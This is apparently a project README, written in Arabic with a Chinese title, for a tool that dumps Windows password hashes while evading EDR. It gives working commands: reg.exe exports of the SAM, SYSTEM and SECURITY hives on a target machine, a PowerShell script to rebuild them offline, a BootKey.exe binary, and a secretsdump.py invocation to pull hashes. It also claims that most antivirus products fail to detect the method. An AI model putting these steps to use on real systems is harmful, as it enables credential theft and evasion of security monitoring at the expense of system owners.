
Windows绕过EDR实现DumpHash
من خلال الاستخدام الموسع لبرنامج النظام الموثوق (المدرج في القائمة البيضاء) Reg.exe، تم تجاوز نقاط اعتراض برامج مكافحة الفيروسات بذكاء، لتحقيق هدف تجاوز EDR واستخراج الهاش (DumpHash).
وفقًا للاختبارات الفعلية، أثبتت هذه الطريقة فعاليتها ضد أنظمة عائلة Windows، ولا تتطلب صعوبة تشغيل كبيرة، وتحمل قيمة عملية حقيقية.
مقالات التطبيق العملي لهذا المشروع:
بعد نشر المقال، لم يُعثر على نفس الفكرة في المجتمعات المحلية والأجنبية، فاعتقدنا في البداية أنها الأولى عالميًا، ولكن لاحقًا وبناءً على تعليقات المتابعين، تبيّن أن هذه الفكرة سبق أن شاركها خبراء في الخارج: Dumping LSA secrets: a story about task decorrelation
تم نشر الكود المصدري وإصدارات (Release) لهذا المشروع على Github. المشاركة ليست بالأمر السهل، وإذا أعجبكم المشروع فتفضلوا بمنحه نجمة (Star)، شكرًا جزيلًا!
نفّذ الأوامر التالية على الجهاز الهدف لتصدير ملف .reg
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
قم بتنزيل ملفات .reg من الخطوة الأولى إلى جهازك المحلي، ثم نفّذ سكريبت PowerShell RegReduction.ps1 الخاص بهذا المشروع على جهازك لاستعادة الملفات الثنائية.
.\RegReduction.ps1
ملاحظة: بعد تنزيل السكريبت من Github يكون ترميزه الافتراضي UTF-8، ويجب تغييره إلى ANSI (GB2312) عبر برنامج المفكرة (Notepad) حتى يتم تنفيذه بشكل صحيح

نفّذ البرنامج التنفيذي BootKey.exe على الجهاز الهدف، وكوده المصدري موجود في ملف BootKey.c ضمن هذا المشروع.
BootKey.exe

اختبار تجاوز برامج مكافحة الفيروسات (2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

يتضمن هذا المقال عدة عمليات رئيسية، لكن الخطوات الجوهرية على الجهاز الهدف تقتصر على خطوتين:
reg.exe export لتصدير محتويات السجل الحساسة؛BootKey.exe لتصدير BootKey الخاص بالنظام.كما تم اختبار الطريقة على أنظمة مختلفة، وكانت النتائج كالتالي:
reg.exe export صلاحية SYSTEM على بيئات Win10 وWin11 وWindows Server 2025، بينما يكفي على بيئات Windows Server 2022 وما دون ذلك امتلاك صلاحيات مدير عادي (دون الحاجة لصلاحية SYSTEM). وإذا كان حجم الملف الناتج عن تصدير السجل باستخدام أمر reg.exe export هو 1KB فقط، فهذا يعني أن الصلاحيات غير كافية.BootKey.exe صلاحيات المدير، وكما أظهرت الاختبارات العملية فإن معظم برامج مكافحة الفيروسات (جميع ما تمت مواجهته حتى الآن) لا تكتشفه إطلاقًا.